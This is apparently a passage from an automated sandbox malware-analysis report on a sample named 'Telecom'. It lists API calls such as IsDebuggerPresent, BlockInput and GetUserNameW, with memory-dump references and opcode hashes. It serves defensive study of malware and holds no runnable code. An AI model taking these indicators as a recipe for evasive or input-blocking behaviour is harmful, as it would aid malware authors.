                                                      • Instruction Fuzzy Hash: 6E2105357012109FE7219F26C964B1B7BE4BFA5314F19806FE8498B351C7B9EC42CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004A8C11
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: ($trP$|
                                                      • API String ID: 1659193697-4102042556
                                                      • Opcode ID: 48e71c2b732b192b9b96b4cfa872a909b443798431c0312e7cba75c3a17495f0
                                                      • Instruction ID: d52f0454edf0f8a086146da4dfececfe04ecdc38b9c979f05d78a60124d412bf
                                                      • Opcode Fuzzy Hash: 48e71c2b732b192b9b96b4cfa872a909b443798431c0312e7cba75c3a17495f0
                                                      • Instruction Fuzzy Hash: 62325774A007059FDB28CF19C481AAAB7F0FF58320B15C56EE49ADB3A1EB74E941CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: LocalTime
                                                      • String ID: %.3d$X64
                                                      • API String ID: 481472006-1077770165
                                                      • Opcode ID: e1979b1566c3b3840fc7885826bae7c5f820c65543acb5602ddf8aab927d3071
                                                      • Instruction ID: 2298d423d0c30ece74f53aed2043c4439da78673a87045f3f7e3f77059322407
                                                      • Opcode Fuzzy Hash: e1979b1566c3b3840fc7885826bae7c5f820c65543acb5602ddf8aab927d3071
                                                      • Instruction Fuzzy Hash: CBD012B1C04108E6CF80D7929D49DB97B7CBB18701F944877F90691041E6289D0A972B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00472A8A
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00472A94
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00472AA1
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: f299353e47caaab447ab987f0967293aa486bbafd3a494d668a7d37e2e75e55e
                                                      • Instruction ID: 52c4f639ae66717c12a94f6186e279fdeb06b76db386383fb49d8ca07b327684
                                                      • Opcode Fuzzy Hash: f299353e47caaab447ab987f0967293aa486bbafd3a494d668a7d37e2e75e55e
                                                      • Instruction Fuzzy Hash: D531D87490121C9BCB21DF68D9887DDBBB8AF18310F5042EAE80CA7250E7749F858F49
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,?,0046502E,?,005098D8,0000000C,00465185,?,00000002,00000000), ref: 00465079
                                                      • TerminateProcess.KERNEL32(00000000,?,0046502E,?,005098D8,0000000C,00465185,?,00000002,00000000), ref: 00465080
                                                      • ExitProcess.KERNEL32 ref: 00465092
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 295a5e44e4b8c4beb36ec4e65e2bab7cb5e760cd713299cdcb7279b8ae078ad5
                                                      • Instruction ID: f60c672614781a780baa47309b3037d3fbc72039dc44b0ebe77aeb17c529f0be
                                                      • Opcode Fuzzy Hash: 295a5e44e4b8c4beb36ec4e65e2bab7cb5e760cd713299cdcb7279b8ae078ad5
                                                      • Instruction Fuzzy Hash: DEE08C31402508AFCF216F54CD08E493B6DEF10385F00402AFC098A231EB39DD42CBC9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,?), ref: 0049E664
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID: X64
                                                      • API String ID: 2645101109-893830106
                                                      • Opcode ID: f9293a10b12fdeb90b59b23761db4994b3165dcab4dcd85c078858ed74648ee8
                                                      • Instruction ID: db5e927173f2414531d419b109f337b73c47092e2105c4520870161d06c37666
                                                      • Opcode Fuzzy Hash: f9293a10b12fdeb90b59b23761db4994b3165dcab4dcd85c078858ed74648ee8
                                                      • Instruction Fuzzy Hash: 69D0C9F480111DFACF80CB50EC88DD9777CBB04304F100662F506A2000D734964A8B18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6e524963ce6c68c089666ae95d937acf582a473e3440411cabf52bc31ff7920a
                                                      • Instruction ID: 9671bd4d31113037605a1fdda62981f1be2bd16a1e32f5c61480646cb2f9d3f3
                                                      • Opcode Fuzzy Hash: 6e524963ce6c68c089666ae95d937acf582a473e3440411cabf52bc31ff7920a
                                                      • Instruction Fuzzy Hash: 29024D71E002199BDF14CFA9C9906AEF7F1FF49314F25826AD819E7380E735A941CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,004C52EE,?,?,00000035,?), ref: 004B4229
                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,004C52EE,?,?,00000035,?), ref: 004B4239
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: 8599202c8f92918c03d22b8ea3c0797b4216937491f7909f31a32fb18b14ab54
                                                      • Instruction ID: 406aa215a790cbcdf69ffb936792ca493dc88ebc882bdc71d8889d7489c4ddb1
                                                      • Opcode Fuzzy Hash: 8599202c8f92918c03d22b8ea3c0797b4216937491f7909f31a32fb18b14ab54
                                                      • Instruction Fuzzy Hash: DBF0E5306002286AEB202666AC4DFEB766DEFC5765F0001BBF505D3281D9709900C7B6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      • Variable is not of type 'Object'., xrefs: 0049224F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable is not of type 'Object'.
                                                      • API String ID: 0-1840281001
                                                      • Opcode ID: 574eeab7fc3eaa339ac6f17d2f5f75a57e6548fd9dc73b323e9dfaec2a63ec08
                                                      • Instruction ID: 82ed73ab1f8ffe68524c5964907bb109a3c959b439ae12266017af174add0ee1
                                                      • Opcode Fuzzy Hash: 574eeab7fc3eaa339ac6f17d2f5f75a57e6548fd9dc73b323e9dfaec2a63ec08
                                                      • Instruction Fuzzy Hash: AD32A030900218EBEF14DF95C985AEEB7B4BF15308F54406BE8056B392DB7D9D0ACB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,00476AD9,00000000,?,00000008,?,?,0048027E,00000000), ref: 00476D0B
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: deb722d0f879e925c981c544bb03cd128d48b9f0fdc71e9c9c433497fa734a8c
                                                      • Instruction ID: bd3c65f87e5f3c22cc1ecee3502105b64d279c6da18a0f9dfb9b21d30dd1fb49
                                                      • Opcode Fuzzy Hash: deb722d0f879e925c981c544bb03cd128d48b9f0fdc71e9c9c433497fa734a8c
                                                      • Instruction Fuzzy Hash: D0B14C71210A089FD725CF28C48AB957BE1FF45364F26C659E89DCF2A1C339E992CB44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 2a88ebfba44e6851761a334ee12cbbcca57ee97ba72c3bd7a16424270ce3dbac
                                                      • Instruction ID: c862ef95539707087e0a7eead402e77f4af4b2fe4f859e7d47da376c49d0ea23
                                                      • Opcode Fuzzy Hash: 2a88ebfba44e6851761a334ee12cbbcca57ee97ba72c3bd7a16424270ce3dbac
                                                      • Instruction Fuzzy Hash: C2127FB59002299FCF14DF58C880AEEB7B5EF48311F1481ABE849EB241D7389E85CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 004BF51A
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      • Opcode ID: 523c0283d89b4cc9b0dc2036d5958c2e8103de9b43759204b006928fef58c317
                                                      • Instruction ID: 3dd8d744936d89764fa34287d0e92678d1d791b2713376b79bb1d1e22af579cc
                                                      • Opcode Fuzzy Hash: 523c0283d89b4cc9b0dc2036d5958c2e8103de9b43759204b006928fef58c317
                                                      • Instruction Fuzzy Hash: AEE0D8312002006FD7109F6AD80098AF7D8AFA4364F04842BF849C7312C674F9408BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 004AEC95
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: mouse_event
                                                      • String ID:
                                                      • API String ID: 2434400541-0
                                                      • Opcode ID: ebc1348bde404ffa0e907e5ef23ecdb671a2657e2d2d1e4a341bc0589e81892f
                                                      • Instruction ID: 8d2980567c557aabb50acb54afedc83650963d7d969c0fb8d79aec20cbcd37fe
                                                      • Opcode Fuzzy Hash: ebc1348bde404ffa0e907e5ef23ecdb671a2657e2d2d1e4a341bc0589e81892f
                                                      • Instruction Fuzzy Hash: F4D05EB619020079F81C0A3E9F2FF770A49E323761F80534FF122D5695E4C9A903912E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0046075E), ref: 00460D4A
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 257fed821a22e2f28e50cbf23f66f3acee4ef855035df3a94ef218143e58cb04
                                                      • Instruction ID: 109c8599dcd869f5ab6d490e5cf219032cc25512b07aa728e3df6b34074986a6
                                                      • Opcode Fuzzy Hash: 257fed821a22e2f28e50cbf23f66f3acee4ef855035df3a94ef218143e58cb04
                                                      • Instruction Fuzzy Hash:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: P6Q
                                                      • API String ID: 0-109905845
                                                      • Opcode ID: e5cbd2fa602a7b22bf496b65c50125da3f2b58952adaf06cc6bc04590f9fb694
                                                      • Instruction ID: b5d8c32d39a47d130d20e0f3a6f1dbc41028a19c6b272049b3da4fbe0a9449e7
                                                      • Opcode Fuzzy Hash: e5cbd2fa602a7b22bf496b65c50125da3f2b58952adaf06cc6bc04590f9fb694
                                                      • Instruction Fuzzy Hash: D421E7727205108BD728CF7AC8236BA73E5A764310F158A2EE4A7C77D0DE79E9049B54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a53ddbbd0739621c9d7741ecebf8f5a78c8e7f675b8a1e1ec1753c02a8b88121
                                                      • Instruction ID: 498fd57ed985c8ce05c649c8a564aa5be2fe12e07293054756195f5c1dd57139
                                                      • Opcode Fuzzy Hash: a53ddbbd0739621c9d7741ecebf8f5a78c8e7f675b8a1e1ec1753c02a8b88121
                                                      • Instruction Fuzzy Hash: 8162F2B1A00205DFEF04DF64C881AAEB7B5FF05304F15456AE806AB391EB39DD42DB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2bac5d1e55a0877e78a97de9f2f3e47a44df485b584605dc8d688d3c9a48ba5
                                                      • Instruction ID: b8dd66052357a99317d55b5611188f4900081cf5213b16fe6450bcafc3e67296
                                                      • Opcode Fuzzy Hash: c2bac5d1e55a0877e78a97de9f2f3e47a44df485b584605dc8d688d3c9a48ba5
                                                      • Instruction Fuzzy Hash: DD327721D29F414DD7239A38CC66336A248AFB73C5F55D737E819B9EA6EB28C5834104
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef21ac4b3cc8c8e851363acc183d99def883b89964b521a69c56a17c50813fca
                                                      • Instruction ID: b62f8734585f22c1ed42370310c5fc248bb83b06a10a059bd0ba8f1090386090
                                                      • Opcode Fuzzy Hash: ef21ac4b3cc8c8e851363acc183d99def883b89964b521a69c56a17c50813fca
                                                      • Instruction Fuzzy Hash: 45321731E005168FDF28CF2AC49467E7BA1AB46301F29857BD846CB396D23CDD86CB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0160a004e0a4ff47f974c18dbd74879c5799c2c2a7f0255e3b7d3b6d552e64d5
                                                      • Instruction ID: 9757a2d72f78010cba733e9dcc6dcac474e24e471918a530803db9edde29ee8a
                                                      • Opcode Fuzzy Hash: 0160a004e0a4ff47f974c18dbd74879c5799c2c2a7f0255e3b7d3b6d552e64d5
                                                      • Instruction Fuzzy Hash: A4B1E020E2AF814DD22396399871336B75CAFFB2D5F52D72BFC2678D62EB2185834144
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                      • Instruction ID: 01271c536d528ba5439a94c37f5eedcae1bce92de7e741420410327d2933f561
                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                      • Instruction Fuzzy Hash: 7591A5721094A31ADB29823D863403FFFE15A523A131A079FD8F2CB2C5FE5CC554E625
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
